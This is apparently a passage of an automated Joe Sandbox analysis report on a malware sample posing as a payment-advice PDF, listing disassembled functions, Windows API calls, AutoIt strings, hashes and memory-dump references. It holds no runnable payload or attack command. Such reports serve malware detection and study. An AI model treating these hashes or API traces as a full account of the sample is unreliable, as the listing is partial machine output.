                                                              • Opcode ID: 89342ac7f8a0dde8ff0d8a6ab1817bfe513c3c4db7990d3ced58d5a2ec3dc065
                                                              • Instruction ID: 14cb27b608869830d70f05c5686c29115f271a62ae8a22bf60343cf2c2f7cf03
                                                              • Opcode Fuzzy Hash: 89342ac7f8a0dde8ff0d8a6ab1817bfe513c3c4db7990d3ced58d5a2ec3dc065
                                                              • Instruction Fuzzy Hash: D31143B9D00649EFDB41CFA9C884EEEBBF9FB18310F108166E914E3220D735AA559F50
                                                              APIs
                                                              • _memset.LIBCMT ref: 008CB644
                                                              • _memset.LIBCMT ref: 008CB653
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00906F20,00906F64), ref: 008CB682
                                                              • CloseHandle.KERNEL32 ref: 008CB694
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseCreateHandleProcess
                                                              • String ID:
                                                              • API String ID: 3277943733-0
                                                              • Opcode ID: 1436bc0c107583539abc9d067f739b7201ceba5238934521397c4009c7150fc5
                                                              • Instruction ID: 0132151b2d8a2416ea74807e5342bb96ff66fc3046f722ab86b9268af647b297
                                                              • Opcode Fuzzy Hash: 1436bc0c107583539abc9d067f739b7201ceba5238934521397c4009c7150fc5
                                                              • Instruction Fuzzy Hash: 45F0FEB25543067EF2102765BC06FBB7A9CFB09795F404021BB08E5192DB755C2097A9
                                                              APIs
                                                              • EnterCriticalSection.KERNEL32(?), ref: 008A6BE6
                                                                • Part of subcall function 008A76C4: _memset.LIBCMT ref: 008A76F9
                                                              • _memmove.LIBCMT ref: 008A6C09
                                                              • _memset.LIBCMT ref: 008A6C16
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 008A6C26
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                              • String ID:
                                                              • API String ID: 48991266-0
                                                              • Opcode ID: a2a9ef78f810501fd056caf82ee167b76fb076716bbd57bf524379452bbc0074
                                                              • Instruction ID: 2749ed8fa8ca5c595d24ad03804f669b89278ab13d65ee1aeb779cab6196a9a2
                                                              • Opcode Fuzzy Hash: a2a9ef78f810501fd056caf82ee167b76fb076716bbd57bf524379452bbc0074
                                                              • Instruction Fuzzy Hash: 56F0543A100100ABDF016F59DC85E4ABB2AFF45361F048061FE089E227C731E811DBB5
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 00842231
                                                              • SetTextColor.GDI32(?,000000FF), ref: 0084223B
                                                              • SetBkMode.GDI32(?,00000001), ref: 00842250
                                                              • GetStockObject.GDI32(00000005), ref: 00842258
                                                              • GetWindowDC.USER32(?,00000000), ref: 0087BE83
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0087BE90
                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0087BEA9
                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0087BEC2
                                                              • GetPixel.GDI32(00000000,?,?), ref: 0087BEE2
                                                              • ReleaseDC.USER32(?,00000000), ref: 0087BEED
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                              • String ID:
                                                              • API String ID: 1946975507-0
                                                              • Opcode ID: c81a80de8fdc24fdbc112808442d4c1e545540ef7bd5ccd4401abc28cbcab6c6
                                                              • Instruction ID: cb3ec2724169d0ebdd5e625930d659908cdf18aac52b937ee6ebbf029edec82c
                                                              • Opcode Fuzzy Hash: c81a80de8fdc24fdbc112808442d4c1e545540ef7bd5ccd4401abc28cbcab6c6
                                                              • Instruction Fuzzy Hash: AFE03932104244AAEB225F64EC0DBD83B22FB05332F148366FB69880E687B18980DB12
                                                              APIs
                                                              • GetCurrentThread.KERNEL32 ref: 0089871B
                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,008982E6), ref: 00898722
                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008982E6), ref: 0089872F
                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,008982E6), ref: 00898736
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CurrentOpenProcessThreadToken
                                                              • String ID:
                                                              • API String ID: 3974789173-0
                                                              • Opcode ID: 07c64bd0bfd9968a8e49cf8275486b3017704978f10f939a3df15450748e23f2
                                                              • Instruction ID: c3ebcec8919de8061b0c218d80a2490160c44f37a80c77cba449cabeb6b6159f
                                                              • Opcode Fuzzy Hash: 07c64bd0bfd9968a8e49cf8275486b3017704978f10f939a3df15450748e23f2
                                                              • Instruction Fuzzy Hash: 60E08676611212EBEB206FF15D0CF567BBEFF51B92F144828B745CA041DB348445C750
                                                              APIs
                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0089B4BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ContainedObject
                                                              • String ID: AutoIt3GUI$Container
                                                              • API String ID: 3565006973-3941886329
                                                              • Opcode ID: 5861f6eda1ba7f7f4083066e3e715929bcaf72211537c4f346feecdf41db39e0
                                                              • Instruction ID: 8624fa83ec30304505aa0ea97e62b57bcd3135ee102a766e5931840a59d5b0f1
                                                              • Opcode Fuzzy Hash: 5861f6eda1ba7f7f4083066e3e715929bcaf72211537c4f346feecdf41db39e0
                                                              • Instruction Fuzzy Hash: 8E914870200605EFDB14EF68D984A6ABBE5FF49710F24856EF94ACB391DB70E841CB50
                                                              APIs
                                                                • Part of subcall function 0085FC86: _wcscpy.LIBCMT ref: 0085FCA9
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              • __wcsnicmp.LIBCMT ref: 008AB02D
                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 008AB0F6
                                                              Strings
                                                              Similarity
                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                              • String ID: LPT
                                                              • API String ID: 3222508074-1350329615
                                                              • Opcode ID: 4c6cd53164174b88a040c96b2594c33b127affe46c212e3696a9906d99ff3543
                                                              • Instruction ID: f480bccf530befa9766872d89d5ac98c237e5d31edfe0df77d35a4214b6267aa
                                                              • Opcode Fuzzy Hash: 4c6cd53164174b88a040c96b2594c33b127affe46c212e3696a9906d99ff3543
                                                              • Instruction Fuzzy Hash: 12618F75A00219AFDB14DF98C8A1EAEB7B4FF09310F10406AF956EB792D770AE44CB51
                                                              APIs
                                                              • Sleep.KERNEL32(00000000), ref: 00852968
                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00852981
                                                              Strings
                                                              Similarity
                                                              • API ID: GlobalMemorySleepStatus
                                                              • String ID: @
                                                              • API String ID: 2783356886-2766056989
                                                              • Opcode ID: ecbafaa564f3791532ddf052c12fdaf5f2161f165e4a8553d0bdde52402715f6
                                                              • Instruction ID: 526a7c1e381f41b0ec68b118b21b584c2cf096d80933f08947e303818ae17f18
                                                              • Opcode Fuzzy Hash: ecbafaa564f3791532ddf052c12fdaf5f2161f165e4a8553d0bdde52402715f6
                                                              • Instruction Fuzzy Hash: 2B5138714187489BD320EF18D886BAFBBE8FF85344F42885DF2D9811A1DB718529CB67
                                                              APIs
                                                                • Part of subcall function 00844F0B: __fread_nolock.LIBCMT ref: 00844F29
                                                              • _wcscmp.LIBCMT ref: 008A9824
                                                              • _wcscmp.LIBCMT ref: 008A9837
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcscmp$__fread_nolock
                                                              • String ID: FILE
                                                              • API String ID: 4029003684-3121273764
                                                              • Opcode ID: a2c74d6753fc8bbcf829f74c4916750083ac4249097058f1b06c4637829b341d
                                                              • Instruction ID: 491f4bd04aaee264e11d0b302606fe02cc6b428384ec44005c104c82ff4cdc15
                                                              • Opcode Fuzzy Hash: a2c74d6753fc8bbcf829f74c4916750083ac4249097058f1b06c4637829b341d
                                                              • Instruction Fuzzy Hash: 56419471A0421DBAEF219BA4CC45FEFBBB9FF86710F014479F904E7181EA759A048B61
                                                              APIs
                                                              • _memset.LIBCMT ref: 008B259E
                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008B25D4
                                                              Strings
                                                              Similarity
                                                              • API ID: CrackInternet_memset
                                                              • String ID: |
                                                              • API String ID: 1413715105-2343686810
                                                              • Opcode ID: 66549f98c1771aa9c225be93b9c230b5d98ffa9d76c2027a01b3853c7e53f7df
                                                              • Instruction ID: 279a23542a42161aad32b17bb00d91ad15c68d1088955a1802e551f5388c3829
                                                              • Opcode Fuzzy Hash: 66549f98c1771aa9c225be93b9c230b5d98ffa9d76c2027a01b3853c7e53f7df
                                                              • Instruction Fuzzy Hash: B131F47180011DABCF11AFA4CC85EEEBFB9FF18350F104069E915AA262EB315956DB61
                                                              APIs
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 008C7B61
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008C7B76
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: '
                                                              • API String ID: 3850602802-1997036262
                                                              • Opcode ID: 4629e6c0c6c47fe47cdf227c284e438cd22ae226749a109fe6e7e5340ff02a48
                                                              • Instruction ID: 10389604879833145b10a42a67f19a8cf47aed4560336019372038fe63212d37
                                                              • Opcode Fuzzy Hash: 4629e6c0c6c47fe47cdf227c284e438cd22ae226749a109fe6e7e5340ff02a48
                                                              • Instruction Fuzzy Hash: 1B41E674A0521A9FDB14CF68C981FEABBB9FB08314F14416AE904EB391E771A951CF90
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?,?), ref: 008C6B17
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 008C6B53
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$DestroyMove
                                                              • String ID: static
                                                              • API String ID: 2139405536-2160076837
                                                              • Opcode ID: dff811d80d02424fde256400e6431bc6367f94e5fa1dcefd3a51c5a5a8a7ec75
                                                              • Instruction ID: 4267918b2d5ac69adade6daaa2bd36f1056e2b56ddb749eeb8aa1ff84aadbb7e
                                                              • Opcode Fuzzy Hash: dff811d80d02424fde256400e6431bc6367f94e5fa1dcefd3a51c5a5a8a7ec75
                                                              • Instruction Fuzzy Hash: 85315C71100608AAEB109F68D841FBB77B9FF48764F10862DF9A5D7191DA31EC91DB60
                                                              APIs
                                                              • _memset.LIBCMT ref: 008A2911
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008A294C
                                                              Strings
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: 8dff00b1700fee5d1ecc9756c7f33d0afeb838907355dcd4df4d0973b2a66aa3
                                                              • Instruction ID: 482951044a39badb318112cfe7fc49829d103de8dc574066f53a4c1d87654ce4
                                                              • Opcode Fuzzy Hash: 8dff00b1700fee5d1ecc9756c7f33d0afeb838907355dcd4df4d0973b2a66aa3
                                                              • Instruction Fuzzy Hash: EA319C316003099BFB348E5CC985FAFBFA9FF46750F180069E985E65A1E7709941CB51
                                                              APIs
                                                              • __snwprintf.LIBCMT ref: 008B3A66
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                              Strings
                                                              Similarity
                                                              • API ID: __snwprintf_memmove
                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                              • API String ID: 3506404897-2584243854
                                                              • Opcode ID: 5bd3c4cfebb42738dc96b4ed9bb81d9851f8f774ff8b050a0fe7f1e1ba4b30f0
                                                              • Instruction ID: ba948b13231a870e06efc61143ec9c68601c6d3948289a3c5d41709712d57bac
                                                              • Opcode Fuzzy Hash: 5bd3c4cfebb42738dc96b4ed9bb81d9851f8f774ff8b050a0fe7f1e1ba4b30f0
                                                              • Instruction Fuzzy Hash: 68215C3160062DAFCF10EFA8CC82AAE77B9FF44710F600454E555EB282DB34EA55CB62
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008C6761
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008C676C
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: Combobox
                                                              • API String ID: 3850602802-2096851135
                                                              • Opcode ID: 394ee815e9aa17f1e88a53dbbdb403a3c6cd4b6fc9e33eac410d8665598ad634
                                                              • Instruction ID: d69a7a9efa007045fec7dd45fc9bc2b08b12c707292d5b85d8dc1b278dd6a311
                                                              • Opcode Fuzzy Hash: 394ee815e9aa17f1e88a53dbbdb403a3c6cd4b6fc9e33eac410d8665598ad634
                                                              • Instruction Fuzzy Hash: FC119071200208AFEF118F54CC81FBB377AFB48368F100629F918D7290E631DC6197A0
                                                              APIs
                                                                • Part of subcall function 00841D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00841D73
                                                                • Part of subcall function 00841D35: GetStockObject.GDI32(00000011), ref: 00841D87
                                                                • Part of subcall function 00841D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00841D91
                                                              • GetWindowRect.USER32(00000000,?), ref: 008C6C71
                                                              • GetSysColor.USER32(00000012), ref: 008C6C8B
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                              • String ID: static
                                                              • API String ID: 1983116058-2160076837
                                                              • Opcode ID: bfb8e8443fbf3d818f32a0f26d0d7af28d6b877f94d0c42bd0c6b88e28b5e091
                                                              • Instruction ID: a72048441b14b1ae043f204c82d3e93314593d230ac25ef9b2d8ff5b4daa2954
                                                              • Opcode Fuzzy Hash: bfb8e8443fbf3d818f32a0f26d0d7af28d6b877f94d0c42bd0c6b88e28b5e091
                                                              • Instruction Fuzzy Hash: 0821F672610209AFEF04DFA8CC45EEA7BB9FB08314F014629FA95D2251E635E861DB61
                                                              APIs
                                                              • GetWindowTextLengthW.USER32(00000000), ref: 008C69A2
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008C69B1
                                                              Strings
                                                              Similarity
                                                              • API ID: LengthMessageSendTextWindow
                                                              • String ID: edit
                                                              • API String ID: 2978978980-2167791130
                                                              • Opcode ID: ecf526e153634f2a37cf3d1f896f319bf49797ca6c35c5c31df9bd9089c6f45f
                                                              • Instruction ID: 109222a6969e68378cbf1b252ecca8312474306a08ac52610eedad2d05ddfa17
                                                              • Opcode Fuzzy Hash: ecf526e153634f2a37cf3d1f896f319bf49797ca6c35c5c31df9bd9089c6f45f
                                                              • Instruction Fuzzy Hash: 8A116D71510108ABEB108E749C45FAB3B7AFB05378F504728FAA5D61E0D731DC65AB60
                                                              APIs
                                                              • _memset.LIBCMT ref: 008A2A22
                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008A2A41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: 9b17b056a6fe93f13d33e7bf25ad037d247840c061893d971fd5bf57090fe384
                                                              • Instruction ID: a8bc64ece9367c7328a1e891762518cf1a7d79f42dcfce2ce510a91589b026d2
                                                              • Opcode Fuzzy Hash: 9b17b056a6fe93f13d33e7bf25ad037d247840c061893d971fd5bf57090fe384
                                                              • Instruction Fuzzy Hash: B911D332A05128ABEF30DA5CD844B9A77B9FB46314F055021ED55E7690D730BD06CB91
                                                              APIs
                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008B222C
                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 008B2255
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Internet$OpenOption
                                                              • String ID: <local>
                                                              • API String ID: 942729171-4266983199
                                                              • Opcode ID: 66ceb498260c418794432be0bb31003795ad32da5f5c49fc3625adad12af06cd
                                                              • Instruction ID: 9246e25141df89f150091e36f47ca5f3000d341a560ba13fab732fc5f1f308ea
                                                              • Opcode Fuzzy Hash: 66ceb498260c418794432be0bb31003795ad32da5f5c49fc3625adad12af06cd
                                                              • Instruction Fuzzy Hash: 3D11C270541229BADB258F558C84EFBFBA8FF16755F10822AFA15D6600D3706990D6F0
                                                              APIs
                                                                • Part of subcall function 008B7FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,008B7DB3,?,00000000,?,?), ref: 008B800D
                                                              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008B7DB6
                                                              • htons.WSOCK32(00000000,?,00000000), ref: 008B7DF3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidehtonsinet_addr
                                                              • String ID: 255.255.255.255
                                                              • API String ID: 2496851823-2422070025
                                                              • Opcode ID: 6fea0df0c8adf78dd94c5b63f692ccfa943b0a4b72fd20a5d20d3167103c7388
                                                              • Instruction ID: ffa4ee6399d87c91951ca34ef55338e0a8e470742d2e2a3a487ff754d9deb5b0
                                                              • Opcode Fuzzy Hash: 6fea0df0c8adf78dd94c5b63f692ccfa943b0a4b72fd20a5d20d3167103c7388
                                                              • Instruction Fuzzy Hash: 15118234504309ABDB20AFA8DC86FFEB725FF44720F14455AEA11D7392DA71A9108691
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 0089AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0089AABC
                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00898E73
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 372448540-1403004172
                                                              • Opcode ID: c0a34aca75a0afc5af8083cbde2ef58241ef2662d04b0cb2c9c69e4d0ebc20c0
                                                              • Instruction ID: ed22399ee1082eb765de68e78ea4ef0e5809c35988a7102e693dec1e33836ce4
                                                              • Opcode Fuzzy Hash: c0a34aca75a0afc5af8083cbde2ef58241ef2662d04b0cb2c9c69e4d0ebc20c0
                                                              • Instruction Fuzzy Hash: 7101D271A0122DAB9F14BBA8CC519FE7769FF06320B080619F831E73D2EE355808C651
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __fread_nolock_memmove
                                                              • String ID: EA06
                                                              • API String ID: 1988441806-3962188686
                                                              • Opcode ID: b18e76207331bab625907756c2759543f0e06d01a11e064b540328ae8a4e7c51
                                                              • Instruction ID: 05adeb769645ca5d627f84da01c1d9754ba317eea00683e2a35750271d9d7857
                                                              • Opcode Fuzzy Hash: b18e76207331bab625907756c2759543f0e06d01a11e064b540328ae8a4e7c51
                                                              • Instruction Fuzzy Hash: 4401DD71D04218BEDB18DBA8CC5AEFE7BF8EB15311F00459FF552D6181E975E6048B60
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 0089AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0089AABC
                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00898D6B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 372448540-1403004172
                                                              • Opcode ID: 8112dc0db5b01c5e4b318cca9cdf34908cd6c8e2e59e09e559f959d7c3852c44
                                                              • Instruction ID: 4d075f3df31faf85dde4c40d531f10330095b00f56fdfc825238689003fb2df4
                                                              • Opcode Fuzzy Hash: 8112dc0db5b01c5e4b318cca9cdf34908cd6c8e2e59e09e559f959d7c3852c44
                                                              • Instruction Fuzzy Hash: 9801D4B1A4110DABDF14FBA4C952EFE77A8FF16340F140029B901E32D2EE245E08D2B2
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 0089AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0089AABC
                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00898DEE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 372448540-1403004172
                                                              • Opcode ID: 9284f1319a4972290ef332fc47e9431ea364ea2730af047c8903bc9e992421b1
                                                              • Instruction ID: 79cbe5dff9a6cdb520d0ee57b7309944dd8382409a48f693445217bcad8a00d2
